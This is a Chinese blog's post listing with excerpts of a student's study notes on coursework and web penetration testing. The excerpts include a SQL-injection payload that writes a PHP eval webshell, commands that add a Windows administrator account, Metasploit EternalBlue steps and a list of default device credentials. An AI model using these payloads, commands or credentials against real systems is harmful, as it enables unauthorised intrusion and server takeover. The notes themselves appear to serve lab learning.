- 博客(39)
- 收藏
- 关注
RSS订阅原创 简单网络通信
2.服务端和客户端代码package wuhu;import java.util.Scanner;import java.io.*;import java.net.ServerSocket;import java.net.Socket;public class server { public static void main(String[] args) throws Exception{ //1.创建一个服务端socket ServerSoc...
2021-12-31 17:50:18
1299
1
原创 RSA算法原理及数字签名技术
1.前言:非对称加密算法的经典算法———RSA算法的应用如今在互联网上的传播已经十分广泛了,RSA公钥加密算法是1977年由RonRivest、AdiShamirh和LenAdleman在(美国麻省理工学院)开发的。RSA取名来自开发他们三者的名字。RSA是目前最有影响力的公钥加密算法,它能够抵抗到目前为止已知的所有密码攻击,已被ISO推荐为公钥数据加密标准。RSA算法基于一个十分简单的数论事实:将两个大素数相乘十分容易,但那时想要对其乘积进行因式分解却极其困难,因此可以将乘积公开作为加密密钥。但是对于量
2021-12-24 23:26:35
4137
原创 数据结构期末复习
把不会的有疑问的知识点都在写在这里:快速排序:貌似是时间复杂度里为O(n*logn)里所有排序方法里最快的。第一个元素先出去,最后排到中间剩的那个位置他来填。e.g.对给定文件(28,7,39,10,65,14,61,17,50,21)选择第一个元素28进行划分,写出其快速排序第一遍的排序过程。初始态:[28] 7 39 10 65 14 61 17 50 21从后往前:21 7 39 10 65 14 61 17 50 [ ]从前往后:21 7 [ ] 10 65 14 61 17 50 3
2021-12-22 12:30:07
354
原创 ARP劫持攻击(实验寒假补)
1.防范ARP攻击的方法:防范方法写在最前面1.静态绑定(ip和Mac地址)cmd下arp -s命令:arp -s ip地址 Mac地址2.安装ARP防火墙如金山防火墙,彩影防火墙等。2.ARP全称Address Resolution Protocol(地址解析协议)3.ARP协议(地址解析协议的功能):主机在发送数据之前将目标ip转换为MAC地址,完成网络地址到物理地址的映射,以保证两台主机之间能正常通信。重点:必须知道MAC地址才能通信,只知道IP地址不行。4.原理:局域网内每
2021-12-14 15:16:55
4215
原创 记一次永恒之蓝漏洞利用
内网环境:kali的IP:192.168.31.66win7的IP:192.168.31.88首先进入msconsole,然后db_status 查看是否连接到了数据库,若没有,退出去初始化数据库:msfdb init打开msfconsole的具体流程可看图:然后搜索永恒之蓝漏洞:search ms17_010use 1->set rhosts 192.168->run若出现绿色加号说明可能存在永恒之蓝漏洞[+] 192.168.31.88:445 - Host is
2021-12-11 23:55:16
2447
原创 数据库期末复习
把不太会的sql语句写到这里,时常看看。阴:列名是英文,显示要中文。如:select SNO as 学号, Sname as 姓名, AGE as 年龄, SEX as 性别 from S where SNO in (select Sno from SC where CNO=‘1001’)and SNO in (select Sno from SC where CNO=‘1003’)1.select S.SNO as 学号,SNAME as 姓名, AVG(grade) as 平均分from S
2021-12-08 21:29:40
1654
原创 数据结构复习篇之查找
1.一些概念(1)查找表查找表就是一个元素的集合静态查找:看查找表中是否存在某元素动态查找:在查找表中添加、删除某元素。(2)平均查找长度(ASL)2…无序表的查找(时间复杂度:O(n))未改进算法:i的每次赋值都要比较i>n?和a[i]==key?最糟糕的情况:比较了2n次改进算法:a[0]存储要查找的元素值,i从n递减,比较元素值是否相等,若不相等直接减1,若相等比较i==0?这样下来最糟糕的情况是比较了n+1次。ASL:在等概率的情况下P(i)=1/n查找成功时的平均查
2021-11-29 22:43:20
1443
原创 期末保命篇之java判断题
java.util.Arrays类提供了诸多对数组进行操作的方法。使用其toString()方法可以对一维数组和二维数组展示其元素数值,equals()方法对一维数组和二维数组的两个数组比较其元素内容数值是否对应相等。待定Java虚拟机可以将类文件(.class)在不同的操作系统上运行,从而实现跨平台特性。待定设类B是类C的父类,语句B x1=new C( );对设类B是类C的父类,语句C x1=new B( );错在Java中,含有抽象方法的类一定是抽象类。对private修饰的成员变
2021-11-26 00:21:06
4523
原创 数据结构保命篇(图)
啊啊啊明天考试,现在开始预习,咳咳,这学期确实没怎么听过课,临时报一波佛教。1.图的基本结构2.图的存储结构3.图的遍历4.最小生成树普里姆算法克鲁斯卡尔算法5.有向无环图及其应用6.最短路径...
2021-11-22 22:19:12
197
原创 SQL注入写webshell
今天来说一下SQL注入中写一句话拿webshell的原理,主要使用的是 SELECT … INTO OUTFILE 这个语句,下面是一个语句的例子: SELECT * INTO OUTFILE ‘C:\log1.txt’例如:?id=1’ union select 1,2,’<?php @eval($_REQUEST[cmd]);?>’ into outfile ‘C:\phpStudy\WWW\502g58de\hahaha.php’ --+然后菜刀连接就完了搞不明白...
2021-11-21 21:52:54
2501
原创 渗透中的一些小细节(持续补充)
1.windows系统添加用户命令:net user admin password /add把新增的用户加入管理员组的命令:net localgroup adminstrators admin /add2.复制网址进行指纹识别,查到该服务器的公网ip,可进行mstsc(远程桌面连接),ip地址 /admin...
2021-11-20 16:39:34
1253
原创 数据结构保命篇(树)之再不学就要挂了
1.树的基本概念:节点,叶子,孩子,双亲,兄弟,结点的度(结点有几个孩子),树的高度或深度,有序树,无序树等。2.树的表示方式:嵌套集合,以广义表形式,凹入表示法。3.树的存储结构:(数组)一、双亲表示法:查找双亲的操作在常数时间内完成,但求结点的孩子需要遍历整个结构二、孩子表示法:(多重链表)便于查找孩子,但不便于查找双亲三、带双亲的孩子表示法:就是双亲表示法的数组部分多了一列,表示双亲的下标四、孩子兄弟表示法:是链表形式左节点表示孩子,右节点表示兄弟,没有兄弟但有多个孩子的
2021-11-15 21:55:55
417
原创 关于gopher协议
一、gopher协议的使用方法(注意请求开头加个_或任意字符),例如/_,不然会丢失一个字节)使用Gopher协议发送一个请求,环境为:nc起一个监听,curl发送gopher请求nc启动监听,监听2333端口:root@Ubuntu ~# nc -lp 2333使用curl发送http请求,命令为root@kali ~# curl gopher://192.168.17.129:2333/abcd此时nc收到的消息为:root@Ubuntu ~# nc -lp 2333bcd可以发
2021-11-09 13:10:18
1581
原创 一些前端姿势
因为做爬虫需要一些前端知识,博主今天来收集一些干货。CSS选择器的优先级优先级:ID选择器>类选择器>标签选择器CSS盒子模型如果给所有内容加上边框的话,页面就是一个矩形,举行中有很多分矩形,像一个盒子。父子选择器>符号表示递进后代选择器空格表示递进...
2021-11-07 16:28:27
52
原创 json web token(JWT)(未完)
json web token的原理是:服务器端验证后,生成一个json对象,发回给用户JWT是一个很长的字符串,包含头部、载荷、签名,中间用.分割为三个部分,即Header.Payload.Signature下面分别学习每个部分:1. HeaderHeader部分是一个JSON 对象。{“alg”: “HS256”,“typ”: “JWT”}alg表示签名的算法,默认HS256;type表示令牌的类型;最后将Header部分的JSON 对象使用Base64URL算法转成字符串。2
2021-11-07 12:12:21
69
原创 逻辑漏洞篇
功能越多的网站,开发员出现疏忽的可能性越大,逻辑漏洞就越容易发现。逻辑漏洞的分类:权限问题,数据问题一、权限问题权限问题可分为三种:未授权访问,越权访问,用户验证缺陷。1.未授权访问:有一个内容需要用户验证才可以获得,但没有对用户进行身份验证,用户就可以获得该内容,这是由于开发时未添加身份验证步骤。2.越权访问横向越权:相同级别的用户之间的访问纵向越权:普通用户可以实现管理员用户的功能3.用户验证缺陷感觉和越权的目的差不多,都是得到其他用户的权限。用户验证缺陷包含多个部分,包括登录体系
2021-11-07 10:51:37
149
原创 java保命篇之再不学就要挂科了
1.抽象类里定义抽象方法:抽象方法前也要加abstract(替换掉public,private)例如:abstract class Converter{abstract void convert();}普通的子类继承父类的语法是:class b extends a{}同样的,子类继承一个抽象类的语法也一样class c extends a{}ps:没有override会有显示错误的红色波浪线...
2021-11-06 20:05:58
199
原创 信息泄露篇
设备-------------- 默认账号 ----------- 默认密码深信服产品 sangfor sangforsangfor@2018sangfor@2019深信服科技 AD dlanrecover深信服负载均衡 AD 3.6 admin admin深信服WAC ( WNS V2.6) admin admin深信服VPN Admin Admin深信服ipsec-VPN (SSL 5.5) Admin Admin深信服AC6.0 admin adminSANGFOR防
2021-11-06 16:46:07
346
原创 堆叠注入的姿势(持续更新)
当网站使用黑名单过滤,把select,union等关键字过滤后,且不易绕过,这时我们可以考虑堆叠注入。1.show语句show databases;show tables from 数据库名;2.handler语句读取当前数据库中某张表里的信息HANDLER 表名 OPEN;HANDLER 表名 READ FIRST;HANDLER 表名 CLOSE;...
2021-11-05 15:16:08
199
原创 关于信息收集
1.旁站和C段的概念旁站是和目标网站在同一台服务器上的其它的网站。C段是和目标服务器ip处在同一个C段的其它服务器。x.x.x.x. 这个ip依次取名为A段,B段,C段,D段,很多公司喜欢买一整个C段用来部署服务器,所以查C段很有必要。2.谷歌语法1.inurl:edu.cn2.filetype:xls3.intext:3.nmap端口破解:namp可以扫描目标端口,判断什么端口开放什么服务。...
2021-10-31 12:43:46
52
原创 php mysql小结(PHP预处理语句)
今天搞一下PHP操纵MySQL,做个小笔记。1.使用MySQL命令行可以打开phpstudy点开MySQL服务,也可以cmd下进入到MySQL下bin目录中,输入net start mysql2.使用PHP连接服务器、创建数据库、数据表、插入一条或多条数据等具体代码就不详细说了,注意主机名。用户名和密码写对就可以了。3.PHP预处理语句(可降低SQL注入的风险)因为sql注入是因为动态字符串的拼接导致sql命令发生改变,然后编译并且执行错误的结果。而sql预处理则是提前“告诉”sql语法处理器
2021-10-23 19:42:14
202
原创 报错注入的姿势
今天看了看报错注入,写篇博客记录一下思路。报错注入主要分三种:floor()报错,extractvlaue()报错和updatexml()报错。floor()是向下取整函数,与之搭配使用的函数有count()函数(计数函数),rand()函数(生成伪随机数函数)。floor()报错报错语句如下,只要执行在数据库版本低于8.0、7.0的版本中执行都会有下面这个错误select floor(rand(0)2)x,count() from information_schema.tables group
2021-09-25 16:51:53
1227
原创 文件上传 upload lab靶场(待补充)
博主最近在学习文件上传漏洞,把相关的姿势整理一下。PASS-1第一关是前端js验证,我们只需在客户端操作就可以了,按F12键查看源码,搜索form关键字,去掉οnsubmit=“return checkFile()”,然后就可以上传php文件了。这里上传了内容为<?php phpinfo() ?>的php文件,上传后直接访问,如图PASS-2姿势:MIME 类型:浏览器通常使用MIME类型(而不是文件扩展名)来确定如何处理URL,因此Web服务器在响应头中添加正确的MIME类型非
2021-09-19 19:19:02
832
原创 WP [ZJCTF 2019]NiZhuanSiWei
做了一道知识点包含反序列化和PHP伪协议的题,写篇博客整理一下思路启动靶机,我们看到如下页面分析代码,定义了text、file、password三个变量,剩下的代码都在一个if里,要上传text,可以使用php://input协议来执行,内容为"welcome to the zjctf",代码总有一个useless.php,我们可以使用php://filter伪协议来读取useless.php的内容。构造payload:/?text=php://input&file=php://filter/
2021-09-12 19:46:30
187
1
原创 极客大挑战 web区PHP WP
今天做了一道PHP反序列化的题,写篇博客整理下思路。启动靶机之后是如下页面:网页提示要寻找网站的备份文件,可以用dirsearch扫描,扫描出来备份文件路径名为www.zip在地址栏输入备份文件路径名后,下载文件夹。解压后得到几个PHP文件打开flag.php,发现只有一句话:<?php$flag = 'Syc{dog_dog_dog_dog}';?>打开class.php,得到如下代码:<?phpinclude(flag.php);class Name{
2021-08-30 23:44:49
129
原创 PHP代码审计常用函数
1.empty:检测变量是否为空2.is null:检测变量是否为NULL3is int is longis double is float is realis numeric:检测变量是否为数字或数字字符串is bool:检测是否是布尔型4.isset:检测变量是否已设置并且非 NULL5.strval:获取变量的字符串值intval:获取变量的整数值boolval:获取变量的布尔值6.unset:释放变量的值7.password_get_info 返回指定散列
2021-08-13 19:30:42
219
原创 关于内存的一些小知识
内存是计算机内的随机访问存储器,用于临时存储程序命令和数据,帮助CPU和硬盘进行数据交换。所有程序的运行都先在内存中运行。一旦关机,内存数据将不保存。一个字节有一个地址。一个字节是八个比特,即八个二进制位,两个十六进制位。32位的处理器一次可处理32位,寻址能力为2的32次方;64位的处理器一次可处理64位,寻址能力为2的64次方。调试可以观察内存中每个地址对应的数据。...
2021-08-06 14:56:53
85
原创 Python爬虫学习笔记(二)
在Python中有一个可以连接互联网的库叫做requests,我们写爬虫代码都要引入这个库。首先要安装这个库,在终端打如下代码:pip install requestspip是Python中的一个安装工具,我们可以用它下载、安装各种库。接下来做一个简单的操作——获得百度首页的HTML代码。import requestsresp=requests.get('https://baidu.com/index.html')print(resp.text)运行后,终端就会显示百度首页的HTML代码
2021-07-30 12:16:13
106
原创 Python爬虫学习笔记(一)
最近博主迷上了Python,准备学习基本语法后学习Python爬虫。关于爬虫,博主的一个大概印象是用Python代码重复做http请求,发送请求的时候要把请求端伪装成一个浏览器,,获得想要的数据并保存在本地。1.URI(统一资源标识符) URL(统一资源标识符)基本格式是:协议+域名(或IP地址+端口号)+请求资源的路径例如:http://www.baidu.com/index.html或http://180.101.49.11:443/ndex.htmlhttps://180.101.49
2021-07-30 08:46:25
71
原创 Python初步学习(二)
今天博主在学Python的文件处理,话不多说,let’s go!前言:我们可以在服务器上用Python写web程序。Python中的文件处理:相比于C语言的文件处理中的函数需要那么多参数,Python这门语言显得人性化的多。一个关键函数是open()函数,open() 函数有两个参数:文件名和模式。1.文件打开有四种打开文件的不同方法(模式):"r" - 读取 - 默认值。打开文件进行读取,如果文件不存在则报错。"a" - 追加 - 打开供追加的文件,如果不存在则创建该文件。"w" - 写
2021-07-28 15:30:28
137
原创 XSS漏洞学习(基础篇)
刚刚看完东京奥运会乒乓球混双比赛,盺雯组合惜败日本,博主也是深感遗憾,但是,中国健儿的顽强拼搏、越到艰难时刻越是奋力拼杀的精神深深感染着我们每一个中国人,我们都要向中国健儿学习!最近博主在学习XSS漏洞,XSS漏洞需要很多前端知识,写此博客,做一个复习(暑假回家,书在学校的无奈)。HTML中表单的格式// HTML表单(输入内容为文本)// An highlighted block<form>First name: <input type="text" name="firs
2021-07-27 02:29:04
349
原创 SQL注入之数据库元数据
数据库里面有元数据,在SQL注入的时候需要用到。数据库里有一个数据库名叫information_schema。information_schema数据库下,有几个比较重要的表。1.schemata存放当前所有数据库信息。常用字段:schema_name(数据库名)2.tables存放(所有数据库中的)所有表信息。tables表的字段:table_name(表名)table_schema(表所属数据库)3.columns存放(所有数据库中的所有表中的)所有字段。columns表的字
2021-07-19 16:45:51
175
原创 PHP初步学习(三)
由于博主今夜失眠,便默默打开电脑,开启深夜爆肝模式,极度伤身,看官老爷们请勿模仿哦。继续PHP学习之旅!PHP中的9个超全局变量$GLOBALS$_SERVER$_REQUEST$_POST$_GET$_FILES$_ENV$_COOKIE$_SESSION可以看到,除了$GLOBALS是刀加大写字母外,其他8个超全局变量都是刀加下划线加大写字母。这些超全局变量可以在整个代码域中运行,具体作用就不展开说了。但是要特别注意 $_SERVER 这个函数,其中 $_SERVER[‘P
2021-07-15 03:03:38
109
原创 PHP初步学习(二)
由于一个一个写函数实在是写不过来,博主就想干脆边实践边积累函数,这样可能会高效一点。1.var_dump()函数var_dump() 函数显示关于一个或多个表达式的结构信息,包括表达式的类型与值。数组将递归展开值,通过缩进显示其结构。下面我们通过例子来看:// var_dump()函数e.g.1//var_dump()函数e.g.1<?php$b = 3.1;$c = true;var_dump($b, $c);?>执行结果为:float(3.1)bool(tru
2021-07-14 20:48:07
46
原创 PHP初步学习(一)
1.PHP的输出风格:echo “I like php!”注意有分号,有双引号,无括号。2.PHP函数1.array()array()函数用来创建一个数组,例如:下面展示一些 内联代码片。array()函数$cars=("volve","bmw","toyota");在PHP中,有三种数组:数值数组 - 带有数字 ID 键的数组关联数组 - 带有指定的键的数组,每个键关联一个多维数组 - 包含一个或多个数组的数组// 数值数组// 数值数组<?php$cars
2021-07-12 21:22:00
159
3
原创 Python语言初步学习(一)
Python语言初步学习这是博主第一次使用Markdown编辑器,不是很会用,写出来的博文可能不是太好看,请各位看官老爷们谅解。之前博主在vscode上配置了Python,毋庸置疑,Python这门语言很重要,所以有必要好好学一下,前几天学习了一些Python的基本语法知识,今天做一个小小的回顾。1.Hello world 程序无论使用哪种语言,hello world都是第一个程序,这里有个小知识点就是Python中 ’ ’ 和 " " 是完全一样的,代码如下:Hello world程序pri
2021-07-12 10:25:16
113
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人